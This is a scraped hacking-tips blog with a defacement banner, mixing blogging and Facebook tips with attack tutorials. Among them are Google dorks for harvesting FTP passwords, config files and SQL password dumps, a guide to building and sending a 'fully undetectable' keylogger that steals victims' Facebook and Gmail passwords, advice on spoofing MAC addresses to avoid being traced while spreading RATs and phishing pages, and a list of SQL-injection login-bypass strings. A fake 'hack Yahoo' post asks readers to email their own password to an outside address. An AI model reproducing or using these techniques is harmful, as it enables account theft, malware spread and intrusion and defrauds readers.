english-inmind.com Hacked by aK47 and D4RK CRYST4L

Website english.inmind.com is hacked by Indian Hackers :- aK47 and D4RK

On Page SEO Optimization Techniques for Blogs/Beginners/Blogger

On Page SEO optimization is a technique to bring your site on to the top pages of search engines so If you want to do SEO for blogs then you can't be ignore on page seo optimization.

What is Denial of Service (DoS) Attacks

Denial Of Service (DoS) Attacks :- A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.

26 Books on Hacking by Ankit Fadia: Free Downloads

Download various books on Hacking by Ankit Fadia for free Collection

Showing posts with label internet tips and tricks. Show all posts
Showing posts with label internet tips and tricks. Show all posts

Wednesday, September 7

Trace a Facebook User While Chatting

Here is a cool and simple way to trace any friend on facebook. It’s is the most useful facebook hack.
If You have unknown friends in your facebook account and then after some time, when you know that he/she is a fake person then with the help of this facebook tricks you can trace his IP address and area. I often accept many unknown friend requests, one day i get into a big problem from a unknown friend of mine. He start abusing me .Then i do some research work and i come to know about this facebook trick and with the help of this PC Trick i came to know that the unknown one is my own friend and he just make a fake ID on facebook.

Anyways here’s is the facebook trick of doing it:

1. First you got to find out the IP address of that User.
To Do so we will be using “netstat” command in windows for this pc trick. If you want to know the IP address of a specific person on facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).
Note: before trying this make sure you close all the other tabs in your browser. and only facebook is open. also if possible delete all the history and cache from your browser.
Now the next step that you have to do for this facebook trick is opens the command prompt Type the following command and hit Enter.
netstat -an
And you will get all established connections IP addresses there. Note down all the suspicious IP’s
2.The Next PC Trick is to trace that user using his IP address:
To do this facebook tricks we will be using IP tracer service. For this Go to the following address : http://www.ip-adress.com/ip_tracer/
and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.
It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you. Use this facebook trick if you are in a problem with some unknown friend.
For more facebook tricks and web tricks click here

How To Unlock Various 3G USB Modems 2011

Use any one of the method to unlock your 3G USB modem,
 Online Huawei Modem Unlock Code Calculator

Step 1: Goto site a-zgsm.com,


Step 2: Enter your modem’s IMEI, enter the CAPTCHA code and click on the “Calculator” button. Within seconds, it will return you with your modems unlock code and flash code.



Step 1: Free Download DC Modem Unlocker Software here.
             Password:  www.wildhacker.com

Step 2: After extraction of file, install the DC Unlocker Software on your computer to see:


Note : If there is a memory card stick on your datacard, please remove it. remove sim card and put sim card preferably from another another carrier that you want to unlock.(it will display invalid sim)

Step 3: Plug your 3G Usb modem stick device in to your computer Usb port or adpater, sometime connection manager will display,close it.

Step 4: Select the manufacture then select the model as Auto detect (recommended). If you know the model and which com port you use.you can do that in same way also.

Step 5: Click the detect Modem button. after your modem model will display below box.

Step 6: When your modem has been detected, then click the Unlock Button at your right hand side top corner.

Thats it........

when you keep another network sim in the Modem , and then insert into computer, the computer will ask for the unlock code so you have to enter the unlock code which you got.
Hence your modem has been unlocked, and now you can use any 3g, 2g sim of any networks.

So friends, I hope this
article will help you to Unlock 3G Modem.
If you have any querries drop the comments below ....

Enjoy !!
Source--> Wild Hacker

Friday, September 2

SQLi | LFI | XSS | Shell UpLoad : Vulnerable site scanner

This is a great tool i find that scans for SQLi | LFI | XSS | ShEll UpLoad vulnerable websites.I used this software when i went to practice now i don't use it any more.


Then follow the procedure how to scan it .... Pic below



Hope you understand..   any queries Do Comment ;)

Download here - http://www.multiupload.com/87MMECTG0Y

Advanced Hacking Using Google

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_rzmVixPGi0Ono1IhA2BTVzKRHR1BXmX2fDDnxwPcrvtvKr0mnKCcd_5SeVArELIRY5cJFQEGHOiENsTIyyRcFONEPe6hGxfHYYgX1BznBAWhjSuEXO_NvAJ59W6NGmQvjGhpNzRF-MJq/s320/google.jpgGoogle is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.


FTP PASSWORDS:

ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.

intitle:index.of ws_ftp.ini
You can also this dork which uses "parent directory" to avoid results other than directory listings
filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"
even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork
"cache:www.abc.com/ws_ftp.ini"
where
www.abc.com is the site you want to check the dork for.
The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided here or from here.

PHP HACKING:


Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.
intitle:index.of config.php
to view php file contents
intitle:"Index of" phpinfo.php
you can also try the directory traversal attack in php using the following dork
inurl:download.php?=filename
if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).
Since most websites today deny this trick, but you may get lucky with some.

SQL DUMPS:

We will be hunting for SQL password dumps saved in database, here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456; one of the most common password people keep..and intext dork will allows to search inside the dump.

ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password
Remember kids:
  1. Use different email providers, substitute gmail/yahoomail instead of somemail ,or try custom domain mail providers.
  2. Use different file extensions.
  3. Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.
  4. Just mix everything up and try different combinations.
ITS NOT YET OVER:


A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.
+htpasswd +WS_FTP.LOG filetype:log
You can substitute "+htpasswd" for "+FILENAME" & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like
phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet
The list goes on and on.. Also you cam try this dork to data mine information about the uploader
"allinurl: "some.host.com" WS_FTP.LOG filetype:log"
which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance.

Also..if you are one hell of a lazy b**tard ,you can do it using some software like Google Hacks..but remember, manual way is the way to go. I may have included some software specific password mining, but that would cripple your imagination.

Tuesday, August 30

Secure Wp-Config File To Prevent Your WordPress Blog From Getting Hacked


Securing To Wp Config File To Prevent Your Wordpress Blog From Getting Hacked Securing To Wp Config File To Prevent Your WordPress Blog From Getting Hacked
If your blog has been hosted on wordpress then your blog is more vulnerable than other blogging platgorms, The reason is that by default the wordpress security is very low and can be compromised easily, Before writing this post I made a little search on the web related to “WordPress Security” and really found some foolish tips out there which would really not help you in any means. So I decided to write a post on my own, There are lots of wordpress admins who use plugins such as login lockdown along with many other plugins to prevent brute force attacks on wordpress, The problem is that now a days a hacker will not use a bruteforce attack or dictionary attack for hacking a wordpress blog, because now a days almost every one atleast has a password of more than 8 characters, and even if some one has a weaker password too, the brute force attacks and Dictionary attacks will be automatically blocked by your webserver, As they have iDS and IPS configured to these kinds of requests automatically.


Phising attacks are also not very common with wordpress blogs and I have seen very rare cases in which wordpress users have fallen for phishing attacks, but almost every time a wordpress user will login into the dashboard by manually adding wp-admin to the end of the url, There are possibliles that wordpress users can be attacked by phishing attacks, but bloggers are already a bit tech savy and won’t fall for these types of attacks, Alternatively if the hacker is smarter and can implement more advanced types of phishing attacks like desktop phishing ,tabnabbing or Dns Spoofing then there are chances that the wordpress user will fall for these attacks.

So How Do Hackers Hack Into WordPress Blogs?

Most of the skilled Hackers will target your wp-config as it’s in an unsecure place by default. Wp-config file is the most important file present on your wordpress blog. It holds very sensitive information such as including your database access, table prefix and Secret Key, So in order to protect your wordpress blog from getting hacked you would need to harden your wp-config file. Here is how a wp-config file looks inside, As you can see from looking into it that it contains very sensitive information.

Protecting Wp-Config File From .htacess

The first step you should take write away is to add the following code to your .htacess file, This is the first step you should take in hardening your wordpress.

# protect wpconfig.php

<files wp-config.php>

order allow,deny

deny from all

</files>


Changing The Permission

Last week I came across a wordpress blog, whose permission for wp-config file was set to readable, All the hacker needed to do is to upload a mysql database and use those to access victim’s wordpress blog. So the bottom line is that the permission should not be set to readable, it should be set to something like “400?.


Security keys were added in wordpress 2.6 to ensure better encryption of information stored in the user’s cookies, A secret key also includes makes it harder to crack your passwords, If some how the hacker gets hold of your wordpress hash, You can get your secret keys fromhere, All you need to do is to add these secret keys to your wp-config file.


Moving Your Wp-Config File


By default Wp-Config is located in the root folder, WordPress themselves recommend users to move their wp-config file to some other place such as outside the root folder, This will prevent the Symlink bypassing attack to the some extent.


Moving To VPS Or Dedicated Host To Prevent Symlink Bypassing Attack
If your wordpress blog is on a shared host then it will be alot more vulnerable to symlink bypassing attack than on VPS or dedicated, If your blog is quite established and you can afford to move to VPS or dedicated hosting, Then I would recommend to move it right away.

I hope you have liked my post on WordPress security, If you are looking for some more ways to protect your wordpress blog, I would recommend you visiting my website regularily.

How to Hide IP Address and Spoof MAC Address | Become Anonymous on Internet


Now today i am going to have another interesting Tutorial , i.e HOW TO HIDE IP ADDRESS AND MAC ADDRESS AND BECOME ANONYMOUS ON NETWORK.
Many of my Daily readers have asked me about how can we become anonymous and do any hacking trick, so by now you will be having anew trick to become anonymous, such that no one can track you. Like wise you can send Phishing pages, spoofed pages and backtrack attack without the fear of being caught.
All the tutorials I have seen on internet tell people How To Set up RAT’s, Keyloggers etc. People follow these steps and start spreading, without doing anything to prevent themselves from being traced. You should follow the below steps before you start spreading, otherwise you will be easy to trace. There is no such thing as 100% anonymous, but this will help you.

This tutorial will show you how to become anonymous on the internet.

How To Hide IP And MAC Address And Becoming Anonymous On Network

How To Spoof/Hide MAC Address
First we will spoof our MAC address. MAC stands for “Media Access Control”. It is commonly used by the authorities to trace hackers. To make it harder to trace us, we can change it!Step1 : Firstly, download the Program NMAC here: 
Step2 : After you have installed it, open it up, and click proceed.You should see a list at the top of the window.
Click on the first one.
Note: The drop-down box under “Network Connection” changes.If you are using a wired connection, you need to select the one that says “Local Area Connection”. If you are using a wireless connection, you need to select the one that says “Wireless Network Connection”. If you are using a VPN, that should be visible too.
 Step3 : Once you have found the correct one, click “Random” as many times as you like.
 Step4 : Now click on “Update MAC”.
 
Click “Yes” to the window that follows, and wait until you get a window telling you that the adapter was restarted succesfully.
Now You just spoofed your MAC address.
 
How To Hide your IP address and encrypt your connection
Next, you need a VPN-Virtual Private Network, This will hide your IP address and encrypt your connection.Step1 : Goto hotspotshield and Click on “Download The Latest Version” on the right-hand side of the page.Note : If you can afford a paid VPN, it is recommended, but a good free one is Hotspot Shield.
 Step2 : Once you have downloaded and installed it, a web page should open up and it should connect to the VPN.Now your IP address will b hide and your Location will be Fake. Just like I used it, and My Location Was set to Milpitas/california – USA.
Note: You cannot go to some sites when using a VPN. This is because of security.
Congratulations! You now have a VPN!
So friends, I hope you like this tutorial.If you have any problem in this tutorial, mention it in comments section.

How to Send a Self Deleting SMS

In this post i will tell you how to send a self deleting SMS to any mobile that is automatically deleted after user reads it.
Basically this technique is called SAFE-TEXT. It’s a technique where a message destroys itself after being read. If you want to call it the Data-centric Suicide Message, that’s fine too. This is a website that allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.
So here’s the thing. With Wikileaks on one side and British libel law on the other, there’s room for a tool that lets you say what needs to be said, but without it falling into the wrong hands in the process.
What it does is allow you to send an expletive-laden opinion of your boss to a co-worker, or an it’s-in-the-public’s-interest-to-know-this leak to your friend on the Guardian (or Wired), without it having a chance to be read by said boss, or unsaid MP.

Note: This trick should only work for British mobile network operators.
Here’s how to use it:
  1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll be able to send up to 10 messages daily.

  2. If you’re the sender, the message will show your name and number.

  3. Write your libel-ridden hate speech and hit send.

  4. The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.

  5. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.

Monday, August 29

Easiest Way to Hack Yahoo Email | Hack Yahoo Account in Just 5 Minutes

yahoo hackHey Friends.Today we are here again with a Tweaky Tutorial on  HOW TO HACK A YAHOO ACCOUNT JUST IN 5 MINS.
It is possible and it is easy. This way of hacking         
into Yahoo email
accounts was brought to my attention by a friend of
mine who is a bit of a
computer wizard. I have tried the method a least a
dozen times and it has
worked on all but 2 occasions, I don’t know the reason
why it failed a
couple of times, but on every other occasion it has
got me the password for
the requested email address.
This is how it is done:
STEP 1- Log in to your own yahoo account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail to:y.helpers@ymail.com
his is a mailing
address to the Yahoo
Staff. The automated server will send you the password
that you have
‘forgotten’, after receiving the information you send
them.
STEP 3- In the subject line type exactly: ” PASSWORD
RECOVERY
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Yahoo Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server.
STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
After This Guyes Send The mail .And Just Wait For 3-4 Minutes. A reply Message By Yahoo Helpers With The successful Confirmation of password recovery will be in your inbox.
Just Open IT.It will be having the password of desired Email-ID.

Disable Google.com From Redirecting To Local Country Google Domain

Google Web Search is customized for a number of countries and regions across the world. For example, Google.co.in provides search results that are most relevant for users in India; Google.co.uk is the Google domain for United Kingdom.Google try to direct users to the site that will give them the most relevant results.

Google.com redirects to local Google country specific domain, depending on the country you are located. For example in India Google.com redirects to Google.co.in and In China Google.com redirects to Google.cn, Similarly it redirects in other countries.In the below picture "Image-1" show browser before redirecting,"Image-2" shows browser after redirecting.

How to disable this redirection and use Google.com for search queries?
This does not involve any software or plugin install. Just type www.google.com/ncr instead of just typing www.google.com in the address bar, where ncr stands for “No Country Redirect”. Next time you type Google.com it won’t get redirected to your country google domain.This information is stored in cookie and you can turn ON the redirection again by deleting internet files and cookies.

MD5 Decrypter | Online MD5 Decryption

Hi guys,i started writing this article because Many pepoles are Asking How To Crash The Hash .So one of the biggest difficulties while your hacking is "Cracking" a hash.While Cracking a hash is difficult,It is better to compare your has with a few existing decrypted hashes.In this article,I'll give you some such sites which does the job neatly.




What is a MD5 Hash ?

To put it in a nutshell,its just a string/integer (or Word/Number)which is encrypted using a particular computer algorithm.While some algorithms are easy to crack,Some take Ages to crack one single password !

Why do we need to Crack ?

Chill out guys ! We are hackers ! That's what we do,find and crack staff so that we can make the world better ithout vulnerabilities.Seriously,MD5 hashes are used in all types of data encryption.

List of Online Services:


The given below are list of free services no nothing is paid service around here !


If this doesn't work out then you have to use a software to decrypt it but it could take a lot of time. 
Enjoy Cracking the hash !
do Comment !

Connect Blog/Website to your Facebook

RSS(Really Simple Syndication) is used to publish frequently updated works such as blog entries, news headlines, audio, and video in a standardized format. RSS reader is a small software program that collects and displays RSS feeds. It allows you to scan headlines and short description from a various website and blogs.

Facebook RSS reader application keeps your Facebook fans Page and friends to updated with the latest news from your sites. Using a RSS application is an great time saving i.e., the post you posted in blog/site will automatically transfer to a Facebook

How it works?
Facebook RSS reader application periodically checks the RSS/Atom feeds that you specify and compare the log file. If any new entry is found, it will publish in your Facebook Walls that you specify.

Top Facebook RSS Feed Reader Application:
RSS Graffiti: Reads your Feeds; Writes your Walls. RSS Graffiti allows you to publish multiple RSS/ATOM feeds on your Facebook profile's & page’s walls and automatically pushes them to the news-feeds (Facebook homepage) of your Facebook friends & fans.

Social RSS: Social RSS allows you to add your blog/favorite RSS feeds to your wall, boxes tab or a dedicated tab on your profile or Facebook Page. It updates automatically and lets your readers subscribe to the feeds if they wish!

Networked Blogs: Bring your blog to Facebook and Facebook to your blog. Supports multiple blogs, RSS and ATOM feeds, and fan/business pages. The best to import your feed. Get your blog networked with the largest blogger community on Facebook.
Benefit of RSS Reader Application
  • It connect your site to your Facebook fans and friends

  • It increase your blog/website traffic

  • Your visitor will get updated information about your site

Monday, August 22

Get your Facebook News feed in Google +


For every app or extension that Facebook blocks from migrating its data to Google+, about ten more seem to pop up. While Facebook is trying its very best to stop people from switching to Google+, people are coming up with more and more ways to use the site from it and with the invites open and working again, these attempts are bound to spike.



Install the extension, allow it to connect with your Facebook account and pull the required information and a Facebook button will be added next to the Home button in the Google+ interface. You can update your status (text updates only) by clicking on the What’s on your mind? field box. As of now, you can’t see status likes or post comments from Google+ but considering all this was possible so soon post Google+, it shouldn’t be too long before someone finds a way to add the functionality.

Install Google+Facebook For Chrome And Firefox

Sunday, August 21

Hack Facebook, Gmail Account Password Using FUD Keylogger

FUD(Fully Undetectable) Keylogger are always in need. But when ever I give any Keylogger it got arrested by most of the Anti-virus. In spite of that I am today going to share a new version of FUD Keylogger to Hack Facebook Account. You can even Hack Gmail Accounts with this keylogger. But mostly this keylogger is used for Hacking Of Facebook Accounts.

 Here I am going to present a New Remote Apolyse Keylogger which has the power to hack facebook accounts and to record all the key strokes typed




Features of New Apolyse Keylogger :
  • UD - 3/33

  • You Can Use Gmail Account to get the logs

  • Add To Start Up also included

  • It also Kills Task Manager

  • Automatically Hides the virus after infecting the victim

  • Also Disables Registry Editing

  • Stops victim From Ending Your Keylogger's Process

  • New Icon Changer

  • File Binder

  • With Fake Error Message

  • Includes Time Interval

Here are the Steps
- Download The Remote Apolyse Keylogger and run the EXE file
- Open the Remote keylogger and enter new created Gmail account username and password
- Select the other settings as you need and donot forget to change Time Interval to 2 min
- If you want then use Icon changer, File Binder, etc and then click on Build Server
- Now upload this keylogger to file sharing sites like megaupload.com , mediafire.com
- Now send Server to victim by any mean and when he/she will click on server, he will be hacked
- Now you will get the victim typed keystroke which also includes Hack Facebook Account Password
- You can hack any account by this Remote Apolyse Keylogger

So you are done, I am sure that you will enjoy this Remote Apolyse Keylogger and if you have any problem then please do comment and share your problem. I am always ready to help you all.
 
Enjoy Hacking
BY 
MR. K0HL1

Thursday, August 11

Embed Facebook Videos to any website or blog !

Facebook is the best way to share our photos our thoughts and also the videos of our life. Just post them in your profile and everybody you know either he or she is in any corner of the world but they will be able to see your videos. Sometimes we share or even see videos on facebook which are really funny or absolutely useful. But we all know that Facebook does not provide any specific embed code to share those videos if you want to share anywhere outside facebook. And if you are a Web Blogger definitely you can share the videos you see on youtube but there is no way you will be able to share the videos you see on facebook. But today I am going to show you a trick with which you will be able share or embed facebook videos to any website or your Blog spot.

So here is the Step-by-step procedure to add facebook videos on any website or Blog:
Step1:First open the video from facebook which you want to share in a new window.


Step2:You can see the number in the image above. After opening the video in the New window select the number at the same place as shown in the above image which you can see is after ‘v’ in the URL.Just copy the number
Step3:Now open the web page where you want to add the video. For example if you want to add video on blog then open the text box in HTML.Then go to the place where you want to place the video in the article. Place the cursor there and Paste the HTML code given below.


<object width="400" height="224" >

<param name="allowfullscreen" value="true" />

<param name="allowscriptaccess" value="always" />

<param name="movie" value="http://www.facebook.com/v/xyz" />

<embed src="http://www.facebook.com/v/xyz" type="application/x-shockwave-flash"

allowscriptaccess="always" allowfullscreen="true" width="400" height="224">

</embed>

</object>
Step4:Then paste the no. which you had copied earlier from the facebook page at the place where it is written xyz in the HTML code.
For example if the no. is 1000000001 then paste the no. at the two places in the HTML code where it is written xyz.
Then you will be able to add videos of facebook at any Website or your Web Blog.

Write More than 420 Letters in your Facebook Status

Facebook is the only word that has kept people all around the world connected and is used by people all through the day. We share photos videos comments and chat with friends using Facebook. In short we are never alone if we are on Facebook. :D
But sometimes we want to share a lot of things with our friends in one status update but we get an error. This is because most of us do not know that we can only use 420 character to successfully update the status. Because of this issue many people in the world are not able to share their exact feelings as they have to shorten the topic.



But now you don't need to hide your feelings just inside your heart because today I am going to show you an effecting trick to share a status update with more than 420 words in Facebook. It means that while using this trick you will not face any problem even if you write more than 420 letters in the status update Facebook.
This can be used for any version of Windows operating systems. The only thing you need to have is the PAINT application.

Here is the step by step process to post a status update exceeding the limit margin of 420 characters on Facebook.

Step1:Go to START menu and then go to “More programs” or “All programs” as per your operating system. Then goto Accessories and then open Paint.

 Step2:Then reduce the Drawing area of the Paint application to the smallest as you can do by dragging the point on the bottom right corner and then Save it. You can see the below screen shot.

Step3:Then open your facebook account in your web browser. Then on the right side of the Share option on the home page click on the Photo option that is the fifth one of the options to share.
Step4:Then click on choose file and select the file which you had just created in paint that is the small file.



Step5:After uploading the photo write as much as you want in the area where it is written “write something about the photo.
Now you can use this trick as many times as you want and write and share large status on Facebook your feelings upto your desire.

Enjoy Updating

Tuesday, August 9

How to Convert PDF to Word online using Facebook

Most of us use Facebook to connect with our friends, colleagues and relatives. Both of us also use it to represent games to obliterate our people time. But make you e’er imagined that instead of chatting with friends or activity games, you can also use Facebook convert PDF to word files. Yes its aline. Here is a Facebook app for the one use.
There are many applications and online tools to convert PDF files to text word files, but PDF to Word edition Facebook differently. It is different converts PDF files directly on Facebook, without installing anything on your PC.  All you need is your Facebook account access and open a Word Facebook PDF editing application. When the application opens, click the Browse button and upload to convert the PDF file. You can also load multiple files. Now the application will automatically convert your PDF files in Word (doc). It will take some time to load depending on the size of the file. After the successful conversion of the file, click download on the download link for the converted file. There is an option to share with your friends.

Do Comment for you Queries!
You can also get me @ facebook
here

Free Domain for your Blog

Do you Blogger or any other blog with a subdomain name ? Get a free Top Domain here !!!

  • 1) Firstly go and make a free blog on blogger.com or any other site. You can also make your own free site on any server like: webs.com 0fees.net or any

  • 2) Make it and keep posting useful topics on it which are popular on Google.com or other search engines.

  • 3) Now make it popular such that it reaches 100 post minimum. Which is very Easy..

  • 4) Now Go to.Hyperwebenable

  • 5) Register there with your Genuine Details and wait for 24 to 48 hours for there Response.

  • 6) Choose a perfect domain and get a free domain for Life

  • Note: If they didn't Reply it means that your application is not approved!

 Your Blog Much be Popular and with some Google PR To get a free Domain !
Thanks for reading
Do Comment !

Increse Your Site Alexa Rank

How To Increase Or Boost Alexa Ranking Tips and TricksAlexa Ranking is Most Important for every Sites, Most of the Blogger and webmaster using hacking bot and many tools but result no change Alexa Rank and Loose your Time and Money, Very Simple Genuine Method Increase your alexa rank, Two Easy way to Increase Alexa rank, Very fast and quick Result .
1. First Install Alexa Toolbar In your Browser , Alexa ToolBar Available both firefox and Google Chrome Browser, and also inform to your blog readers and friends to install alexa toolbar, Alexa toolbar most important boost your alexa rank.
2. Register alexa.com and add your site and verify your site, and add alexa rank widget on your website or blog, This alexa widget track all your website vistor and Improve your Alexa Ranking.

Enjoy with your all updated alexa rank !

Do Comment

Add Facebook Comments Box to your Blog

In 2009 Facebook developers introduced their best social plugin called "Facebook Comments Box". This plugin can be embedded in any website or blog and visitors can use their IDs of Facebook, Yahoo, AOL or Hotmail to leave a comment at your site. This plugin did show a lot of problems when it was embedded in Blogger Blogs in initial days of its development but now thanks to our fellow friend Max from Allblogtools.com this plugin has been finally bloggerized to work just perfect with any Blogger hosted blogs. I have edited Max's coding in some areas and have mentioned some more interesting options that will help you use the Facebook comments box in parallel to your old Blogger Comment form so that you may loose no previous comments and provide users with multiple options of commenting from different platforms.
Live Demo
This is how the Facebook Comments box looks like,
LIGHT SCHEME
facebook-commentS-box LIGHT
DARK SCHEME

Facebook-comments-dark-scheme
Interesting? Lets now learn how to embed this extremely useful comment form in Blogspot blogs. Kindly follow the simple steps below,

1- Get a Facebook Application ID
  1. Go To Facebook Developers Page

  2. Submit your blog URL and give it a name. Keep Site name as your "Blog Title" and Site URL as your "blog address"

site-url
     3.   Hit "create app" button and proceed
     4.   After submitting the security check code you will see this page,
app-id
       5.   Save that App ID in a notepad because we will need that latter. Now Click the link near the top-right corner of the same page that says "Developer Dashboard"
image
      6.  One the new window that appears click the Edit Settings link ,
edit-settings
        7.  Then go to Website option and write your Site Domain as blogspot
website
       8.  Save Changes and jump to the next step of this tutorial
2- Adding the Facebook comments Box to Blogger
Now its time to do embed the comments box in your blog templates. So follow these easy steps,
PS: Please make sure your blogger comment form is embedded below posts. For doing this first go to Blogger > Settings > comments > and then choose embed comments below posts. After doing this follow the tutorial below.
  1. Go To Blogger > Design > Edit HTML

  2. Backup your template

  3. Check the "Expand Widget Templates" box

  4. Search for <html and just after it give a space and add this code,

xmlns:fb='http://www.facebook.com/2008/fbml'



5.  Next search for 



<body>



Note: In New Blogger Designed templates the same code looks like this,



<body expr:class='&quot;loading&quot; + data:blog.mobileClass'>



Find any one of these codes and just after it paste the code given below,


<div id='fb-root'/>

<script>


    window.fbAsyncInit = function() {


    FB.init({


      appId  : &#39;YOUR_APP_ID&#39;,


      status : true, // check login status


        cookie : true, // enable cookies to allow the server to access the   session


      xfbml  : true  // parse XFBML


    });


  };


    (function() {


    var e = document.createElement(&#39;script&#39;);


      e.src = document.location.protocol +   &#39;//connect.facebook.net/en_US/all.js&#39;;


    e.async = true;


      document.getElementById(&#39;fb-root&#39;).appendChild(e);


    }());


</script>


  • Replace YOUR_APP_ID with your Facebook application ID that you saved in a notepad.

     6.    Next search for  </head> and just above it paste the following code,

<meta expr:content='data:blog.pageTitle' property='og:title'/>

<meta expr:content='data:blog.url' property='og:url'/>


<meta content='MY Blogger Tricks' property='og:site_name'/>


<meta content='BLOG-LOGO-IMAGE-LINK' property='og:image'/>


<meta content='YOUR_APP_ID ' property='fb:app_id'/>


<meta content='http://www.facebook.com/mybloggertricks' property='fb:admins'/>


<meta content='article' property='og:type'/>



Make these changes:

  • Replace MY Blogger Tricks with your blog title/Name.

  • Replace BLOG-LOGO-IMAGE-LINK with the image link of your logo. Your logo will look good if it is in gif format and having this size ->  40px by 40px . This logo will appear next to your post title on Facebook profiles of your visitors like this,


logo

  • Replace YOUR_APP_ID  with the your Facebook Application ID that you saved in notepad



If you faced any problem then kindly do not hesitate to let me know. It would be a pleasure to be at your service.  I hope this plugin proves useful to most of you and it may bless your blogs with even more organic traffic. 
Do Comment !

Sunday, August 7

Hack Website Using SQL Injection

Q: What is sql injection?                                                                   
A injecting sql queries into another database or
using queries to get authentication bypass as an admin.
Part 1 : Basic sql injection
Gaining authentication bypass on an admin account.Most sites vulnerable to this are .asp,So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit ”
There is a large number of google dork for basic sql injection.

here is the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Now what to do once we get to our site.
the site should look something like this :
Welcome to xxxxxxxxxx administrator panel
Username :
Password:
So what we do here is in the username we always type “Admin
and for our password we type are sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE…
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the database till it gives you authentication bypass.
So your input should look like this
username:Admin
password:’or’1′=’1
So click submit and you’r in
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK-
1- Put encryption on the passwords.
2- Change the platform
of your website from asp to php.

Related Posts Plugin for WordPress, Blogger...